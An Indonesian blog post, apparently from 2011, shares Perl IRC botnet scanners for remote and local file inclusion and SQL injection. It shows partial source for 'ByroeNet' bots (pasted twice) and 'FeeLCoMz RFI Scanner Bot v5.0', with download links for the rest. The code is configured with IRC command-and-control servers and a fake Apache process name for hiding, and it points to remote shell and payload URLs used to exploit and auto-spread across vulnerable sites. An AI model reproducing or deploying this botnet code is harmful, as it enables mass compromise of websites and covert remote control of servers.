Home » » KUMPULAN BOT PERL [ LFI RFI SQLI DLL]

KUMPULAN BOT PERL [ LFI RFI SQLI DLL]

Written By soni alson ibrahimovic on Sabtu, 25 Juni 2011 | 08.52

#!/usr/bin/perl
$powered=”ByroeNet”;
$mail=”admin(at)byroe.net”;
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use IO::Select;
use IO::Socket::INET;
use Socket;
use HTTP::Request::Common;
use LWP::Simple;
use LWP 5.64;
use HTTP::Request::Common qw(POST);
use Digest::MD5 qw(md5_hex);
use MIME::Base64;
my $fakeproc = “/usr/sbin/apache2 -k start”;
$ircserver = “irc.malangcyber.server.or.id”;
my $ircport = “6667″;
my $nickname = “loveYou”;
my $ident = “love”;
my $channel = “#malangcyber”;
my $runner = “xr0b0t”;
my $fullname = ‘matamu hahah’;
my $lfi = “!lfi”;
my $xml = “!xml”;
my $e107 = “!e107″;
my $sql = “!sql”;
my $rfi = “!rfi”;
my $cmdlfi = “!cmdlfi”;
my $cmde107 = “!cmde107″;
my $cmdxml = “!cmdxml”;
Download disini + id

=======================selesai di sini ================

e107 Scanner ByroeNet


#!/usr/bin/perl

$powered=”ByroeNet”;
$mail=”admin(at)byroe.net”;
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use IO::Select;
use IO::Socket::INET;
use Socket;
use HTTP::Request::Common;
use LWP::Simple;
use LWP 5.64;
use HTTP::Request::Common qw(POST);
use Digest::MD5 qw(md5_hex);
use MIME::Base64;
my $fakeproc = “/usr/sbin/apache2 -k start”;
$ircserver = “irc.malangcyber.server.or.id”;
my $ircport = “6667″;
my $nickname = “loveYou”;
my $ident = “love”;
my $channel = “#malangcyber”;
my $runner = “xr0b0t”;
my $fullname = ‘matamu hahah’;
my $lfi = “!lfi”;
my $xml = “!xml”;
my $e107 = “!e107″;
my $sql = “!sql”;
my $rfi = “!rfi”;
my $cmdlfi = “!cmdlfi”;
my $cmde107 = “!cmde107″;
my $cmdxml = “!cmdxml”;
Download disini + id
=============selesai di sini ================

FeeLCoMz RFI Scanner Bot v5.0

Filed in ./Bot RFI0 comments
#!/usr/bin/perl
print(‘
###############################################
## FeeLCoMz RFI Scanner Bot v5.0 ##
## By FaTaLisTiCz_Fx ##
## © Agu 2008 – Feb 2009, FeeLCoMz Community ##
## http://feelcomz.co.cc ##
## modified by cLassic RosE ##
###############################################
‘);
######################################################
## Usage: ##
## perl feelscanz.pl ##
## Notes: ##
## + All Parameters are optional ##
## ##
## Features: ##
## + RFI Scanner ##
## + RFI Scan & Exploit (Exploit per engine) ##
## + Joomla RFI Scan & Exploit ##
## + Milw0rm Search ##
## + Google bypass (Using PHP) ##
## + Message Spy & Save ##
## + Auto Spreading ##
######################################################
## History:
## + Fixed cryptz command (v4.5)
## + Fixed user commands execution by unauthorized user (v4.6) (thanks to ajegile)
## + Added options to enable/disable encrypted password (v4.7)
## + Fixed missing hostname on sublink (v4.8)
## + Added links filter to exclude exploiting bad links (v4.9)
## + Fixed private message scanning (v4.9.2) (thanks to BLood_roSE)
## + Added spread configuration (v5.0)

use strict;
use IO::Socket::INET;
use LWP::UserAgent;
use HTTP::Request;
my $versi = “v5.0″;
my $cmdpre = “^”; #commend
my $mysite = “http://www.mysandhaanu.com//includes/”; #Path to Sources URL (Optional)
##[ KONFIGURASI URL ]##
my $fx29id = “http://indiamariae.com/includes/1.txt????”; #Fx29ID1 (Simple) / #Fx29ID2 (Advanced)
my $fx29id2 = “http://indiamariae.com/includes/2.txt???”; #Fx29ID2 (Advanced)
my $fx29sh = “http://www.mysandhaanu.com//scripts/inc.pdf?????”; #Fx29Sh (Optional)
my $bypass = “http://gamernz.com/google.php”; #Google Bypasserz (Optional)
##[ KONFIGURASI SOURCE ]##
my $spread = $mysite.”red.jpg?”; #Fx29Spreadz (Optional)
my $joomlaz = $mysite.”red.jpg”; #Joomla’s Bugs List (Required for Joomla RFI Scanner)
##[ KONFIGURASI IRC ]##
my @servers = (“irc.kamtiez.server.or.id”); #IRC Servers (Separated by coma)
my %bot = (
nick => “Mbem[".int(rand(100))."]“,
ident => “Septiy”.int(rand(100)),
chan => “#xr0b0t”, #Channels to join (Separated by coma)
server => “irc.kamtiez.server.or.id”,
port => “7000″
);
donwload disini + id
Share :

0 komentar:

Poskan Komentar

Blogroll

Kuliner